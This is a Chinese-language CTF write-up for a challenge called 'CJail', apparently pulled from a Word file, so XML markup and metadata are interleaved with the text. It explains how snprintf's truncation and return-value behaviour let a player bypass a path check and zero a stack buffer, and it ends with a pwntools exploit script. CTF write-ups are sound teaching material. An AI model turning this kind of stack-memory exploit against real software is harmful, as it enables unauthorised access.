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CJail writeup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这道题目考的是选手对C语言函数的理解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首先题目要求我们输入一个路径且这一个路径存在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9812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的突破点是snprintf函数，该函数会先进行格式化字符串拼接然后将结果的前0x30自己返回给name，也就是说如果s的长度足够长，那么name中就不会出现.key，由于我们不知道远程环境有什么文件以及目录，所以我们可以令name全为/，因为这个目录一定存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第二个问题在于这一个置零操作，这里的关键也是是snprintf函数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191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    The functions snprintf() and vsnprintf() do not write more than  size  bytes  (including  the  terminating  null  byte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    ('\0')).   If the output was truncated due to this limit, then the return value is the number of characters (excluding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    the terminating null byte) which would have been written to the final string  if  enough  space  had  been  available.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也就是说，如果我input的字符数为0x100个a，那么data中的数据将会是0x20个a以及data[0x100]的值为\x00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观察题目：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267200" cy="14859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data数组在randomStr的上方，且都在栈上，地址内存都连着，所以我们能够使用snprintf函数将randomStr的值全部置为\x00，最后再输入string的时候输入\x00即可获得flag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exp：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from pwn import *</w:t>
              <w:br/>
              <w:t>p = remote('',)</w:t>
              <w:br/>
              <w:br/>
              <w:t>p.recvuntil('Please input the key of admin:')</w:t>
              <w:br/>
              <w:t>p.send(b'/'*0x2f)</w:t>
              <w:br/>
              <w:br/>
              <w:t>for i in range(0x20):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    p.recvuntil("Please input your string")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    p.sendline(b'a'*(0x4f-i))</w:t>
              <w:br/>
              <w:t xml:space="preserve">    p.recvuntil('(y/n)')</w:t>
              <w:br/>
              <w:t xml:space="preserve">    p.sendline(b'y')</w:t>
              <w:br/>
              <w:br/>
              <w:t>p.recvuntil("Please input your string")</w:t>
              <w:br/>
              <w:t>p.sendline(b'\x00')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p.interactive()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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2024-08-01T10:08:18Z</dcterms:created>
  <dc:creator>Apache POI</dc:creator>
</cp:coreProperties>
</file>